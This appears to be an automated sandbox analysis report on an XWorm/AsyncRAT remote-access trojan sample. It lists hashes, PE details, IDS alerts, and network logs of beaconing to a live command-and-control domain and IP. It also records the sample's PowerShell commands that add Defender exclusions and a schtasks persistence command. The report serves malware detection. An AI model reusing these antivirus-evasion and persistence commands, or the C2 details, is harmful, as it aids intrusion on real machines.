                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:PjGz899RZV.exe
                                                                    File size:38'400 bytes
                                                                    MD5:2fcde28ef23d2644520ac5aefc123e61
                                                                    SHA1:ce5c3d508ac86a431619f84d2d10ff149479e8bf
                                                                    SHA256:53db4fa18cd42cdb875538b91c6f500f22727be4cd1d0e0a618159462a8b76ba
                                                                    SHA512:08211849be5047245a3327c89f1f952cbe9b870bacd72fbff6e4ddd69d762e88b68be044ddcec53b8781da9267358939002337990eec542befd334f733ed4af3
                                                                    SSDEEP:768:xLyB8NkqoKs4LB8ejyAEM5FWPh9rF67OwhP9JIkH:x01qof4L2EFK9rF67OwRPR
                                                                    TLSH:C9035C443FD4822AC5FE6BFA2972A2150271E6039E23DF5E08D4956A6F37FC44A053D7
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....eg............................n.... ........@.. ....................................@................................

                                                                    File Icon

                                                                    Icon Hash:00928e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x40aa6e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x67658EFB [Fri Dec 20 15:36:27 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xaa200x4b.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x4e0.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x8a740x8c00af938ca1e01af6a093ffe64108ba2b63False0.48978794642857143data5.674193470127746IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0xc0000x4e00x60016ad0bb50a751ff817986a46790244bfFalse0.37890625data3.74423362309005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0xe0000xc0x2004888fe0d82a3655bd240dd6bd02390d2False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_VERSION0xc0a00x24cdata0.47278911564625853
                                                                    RT_MANIFEST0xc2f00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-12-20T19:01:41.924244+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.649910147.185.221.2438116TCP
                                                                    2024-12-20T19:02:03.277167+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.649961147.185.221.2438116TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 20, 2024 19:00:44.192399979 CET4980138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:00:44.315383911 CET3811649801147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:00:44.315468073 CET4980138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:00:44.401918888 CET4980138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:00:44.525233984 CET3811649801147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:00:58.683888912 CET4980138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:00:58.804254055 CET3811649801147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:06.221714973 CET3811649801147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:06.221807957 CET4980138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:07.736589909 CET4980138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:07.737701893 CET4985838116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:07.856151104 CET3811649801147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:07.857295990 CET3811649858147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:07.857377052 CET4985838116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:07.883177996 CET4985838116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:08.002996922 CET3811649858147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:22.002928972 CET4985838116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:22.122509003 CET3811649858147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:29.754467010 CET3811649858147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:29.754683018 CET4985838116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:29.814717054 CET4985838116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:29.816040993 CET4991038116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:29.934907913 CET3811649858147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:29.935991049 CET3811649910147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:29.936086893 CET4991038116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:29.959099054 CET4991038116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:30.078777075 CET3811649910147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:41.924243927 CET4991038116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:42.043803930 CET3811649910147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:51.830261946 CET3811649910147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:51.830336094 CET4991038116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:51.830404997 CET4991038116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:51.833564043 CET4996138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:51.950041056 CET3811649910147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:51.953196049 CET3811649961147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:51.953277111 CET4996138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:51.983850956 CET4996138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:52.103652000 CET3811649961147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:52.103739023 CET4996138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:52.223385096 CET3811649961147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:56.705471992 CET4996138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:56.825927973 CET3811649961147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:01:57.158559084 CET4996138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:01:57.278194904 CET3811649961147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:02:02.343096018 CET4996138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:02:02.462702990 CET3811649961147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:02:02.790981054 CET4996138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:02:02.910613060 CET3811649961147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:02:02.910820961 CET4996138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:02:03.030404091 CET3811649961147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:02:03.153239965 CET4996138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:02:03.277010918 CET3811649961147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:02:03.277167082 CET4996138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:02:03.398976088 CET3811649961147.185.221.24192.168.2.6
                                                                    Dec 20, 2024 19:02:07.647160053 CET4996138116192.168.2.6147.185.221.24
                                                                    Dec 20, 2024 19:02:07.766860962 CET3811649961147.185.221.24192.168.2.6

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 20, 2024 19:00:43.914254904 CET5954253192.168.2.61.1.1.1
                                                                    Dec 20, 2024 19:00:44.189271927 CET53595421.1.1.1192.168.2.6

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 20, 2024 19:00:43.914254904 CET192.168.2.61.1.1.10xb124Standard query (0)below-communist.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 20, 2024 19:00:44.189271927 CET1.1.1.1192.168.2.60xb124No error (0)below-communist.gl.at.ply.gg147.185.221.24A (IP address)IN (0x0001)false

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:12:59:57
                                                                    Start date:20/12/2024
                                                                    Path:C:\Users\user\Desktop\PjGz899RZV.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\PjGz899RZV.exe"
                                                                    Imagebase:0xe0000
                                                                    File size:38'400 bytes
                                                                    MD5 hash:2FCDE28EF23D2644520AC5AEFC123E61
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:2
                                                                    Start time:13:00:01
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe'
                                                                    Imagebase:0x7ff6e3d50000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:13:00:01
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:13:00:09
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PjGz899RZV.exe'
                                                                    Imagebase:0x7ff6e3d50000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:13:00:09
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:8
                                                                    Start time:13:00:19
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\PjGz899RZV.exe'
                                                                    Imagebase:0x7ff6e3d50000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:9
                                                                    Start time:13:00:19
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:11
                                                                    Start time:13:00:37
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
                                                                    Imagebase:0x7ff650070000
                                                                    File size:235'008 bytes
                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:12
                                                                    Start time:13:00:37
                                                                    Start date:20/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:15
                                                                    Start time:13:00:50
                                                                    Start date:20/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
                                                                    Imagebase:0xe90000
                                                                    File size:38'400 bytes
                                                                    MD5 hash:2FCDE28EF23D2644520AC5AEFC123E61
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, Author: ditekSHen
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 82%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:16
                                                                    Start time:13:00:58
                                                                    Start date:20/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
                                                                    Imagebase:0x7c0000
                                                                    File size:38'400 bytes
                                                                    MD5 hash:2FCDE28EF23D2644520AC5AEFC123E61
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:17
                                                                    Start time:13:01:01
                                                                    Start date:20/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                                    Imagebase:0x9e0000
                                                                    File size:38'400 bytes
                                                                    MD5 hash:2FCDE28EF23D2644520AC5AEFC123E61
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:18
                                                                    Start time:13:02:00
                                                                    Start date:20/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                                    Imagebase:0x6b0000
                                                                    File size:38'400 bytes
                                                                    MD5 hash:2FCDE28EF23D2644520AC5AEFC123E61
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:29.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:6
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 4728 7ffd34562e51 4730 7ffd34562e57 SetWindowsHookExW 4728->4730 4731 7ffd34563021 4730->4731 4724 7ffd345629fd 4725 7ffd34562a2f RtlSetProcessIsCritical 4724->4725 4727 7ffd34562ae2 4725->4727

                                                                      Executed Functions

                                                                      Function 00007FFD34560E89 Relevance: 2.2, Strings: 1, Instructions: 915COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 7ffd34560e89-7ffd34560ec0 2 7ffd345617ad-7ffd34561956 0->2 3 7ffd34560ec6-7ffd34560f9e call 7ffd345604d8 * 5 call 7ffd345605d8 0->3 45 7ffd34560fa0 3->45 46 7ffd34560fa7-7ffd34560feb call 7ffd34560490 3->46 45->46 52 7ffd34561013-7ffd34561033 46->52 53 7ffd34560fed-7ffd3456100c call 7ffd34560358 46->53 59 7ffd34561044-7ffd345610a8 call 7ffd34560710 52->59 60 7ffd34561035-7ffd3456103f call 7ffd34560368 52->60 53->52 70 7ffd345610ae-7ffd34561143 59->70 71 7ffd34561148-7ffd345611d6 59->71 60->59 90 7ffd345611dd-7ffd34561295 call 7ffd34560868 call 7ffd34560800 call 7ffd34560378 call 7ffd34560388 70->90 71->90 107 7ffd345612bc-7ffd345612dc 90->107 108 7ffd34561297-7ffd345612b5 call 7ffd34560358 90->108 114 7ffd345612de-7ffd345612e8 call 7ffd34560368 107->114 115 7ffd345612ed-7ffd3456134c 107->115 108->107 114->115 122 7ffd34561374-7ffd34561394 115->122 123 7ffd3456134e-7ffd3456136d call 7ffd34560358 115->123 129 7ffd34561396-7ffd345613a0 call 7ffd34560368 122->129 130 7ffd345613a5-7ffd34561487 122->130 123->122 129->130 144 7ffd34561489-7ffd345614bc 130->144 145 7ffd345614d5-7ffd34561508 130->145 144->145 152 7ffd345614be-7ffd345614cb 144->152 156 7ffd3456152d-7ffd3456155d 145->156 157 7ffd3456150a-7ffd3456152b 145->157 152->145 155 7ffd345614cd-7ffd345614d3 152->155 155->145 158 7ffd34561565-7ffd3456159c 156->158 157->158 165 7ffd345615c1-7ffd345615f1 158->165 166 7ffd3456159e-7ffd345615bf 158->166 167 7ffd345615f9-7ffd345616db call 7ffd34560398 call 7ffd34560578 call 7ffd34560710 165->167 166->167 186 7ffd345616e2-7ffd34561770 167->186 187 7ffd345616dd call 7ffd345607d0 167->187 186->2 187->186
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: SAM_^
                                                                      • API String ID: 0-3658645246
                                                                      • Opcode ID: 4b1d006975b896b1264d1cb1a22689aeb63ac751bbd16c47a7faf60afc1785df
                                                                      • Instruction ID: aa73e0935d31567d7df37afcbcbfd95da461eaa13e13f73f444aff0caabf0409
                                                                      • Opcode Fuzzy Hash: 4b1d006975b896b1264d1cb1a22689aeb63ac751bbd16c47a7faf60afc1785df
                                                                      • Instruction Fuzzy Hash: 1E520871B1CA094FEB69FB6884697B977D6EF9A320F440179E44EC32D2DE2DAC418341
                                                                      Function 00007FFD34560808 Relevance: 2.0, Strings: 1, Instructions: 793COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 198 7ffd34560808-7ffd34560e7b 201 7ffd34560e7d-7ffd34560e85 198->201 202 7ffd34560ef5 198->202 203 7ffd34560efc-7ffd34560f9e call 7ffd345604d8 * 3 call 7ffd345605d8 202->203 204 7ffd34560ef7 call 7ffd345604d8 202->204 223 7ffd34560fa0 203->223 224 7ffd34560fa7-7ffd34560feb call 7ffd34560490 203->224 204->203 223->224 230 7ffd34561013-7ffd34561033 224->230 231 7ffd34560fed-7ffd3456100c call 7ffd34560358 224->231 237 7ffd34561044-7ffd345610a8 call 7ffd34560710 230->237 238 7ffd34561035-7ffd3456103f call 7ffd34560368 230->238 231->230 248 7ffd345610ae-7ffd34561143 237->248 249 7ffd34561148-7ffd345611d6 237->249 238->237 268 7ffd345611dd-7ffd34561295 call 7ffd34560868 call 7ffd34560800 call 7ffd34560378 call 7ffd34560388 248->268 249->268 285 7ffd345612bc-7ffd345612dc 268->285 286 7ffd34561297-7ffd345612b5 call 7ffd34560358 268->286 292 7ffd345612de-7ffd345612e8 call 7ffd34560368 285->292 293 7ffd345612ed-7ffd3456134c 285->293 286->285 292->293 300 7ffd34561374-7ffd34561394 293->300 301 7ffd3456134e-7ffd3456136d call 7ffd34560358 293->301 307 7ffd34561396-7ffd345613a0 call 7ffd34560368 300->307 308 7ffd345613a5-7ffd34561487 300->308 301->300 307->308 322 7ffd34561489-7ffd345614bc 308->322 323 7ffd345614d5-7ffd34561508 308->323 322->323 330 7ffd345614be-7ffd345614cb 322->330 334 7ffd3456152d-7ffd3456155d 323->334 335 7ffd3456150a-7ffd3456152b 323->335 330->323 333 7ffd345614cd-7ffd345614d3 330->333 333->323 336 7ffd34561565-7ffd3456159c 334->336 335->336 343 7ffd345615c1-7ffd345615f1 336->343 344 7ffd3456159e-7ffd345615bf 336->344 345 7ffd345615f9-7ffd345616db call 7ffd34560398 call 7ffd34560578 call 7ffd34560710 343->345 344->345 364 7ffd345616e2-7ffd34561956 345->364 365 7ffd345616dd call 7ffd345607d0 345->365 365->364
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: SAM_^
                                                                      • API String ID: 0-3658645246
                                                                      • Opcode ID: 157871a218a551e3f179c196cb3c822ada692e7dc732850c4b93af4d39d79313
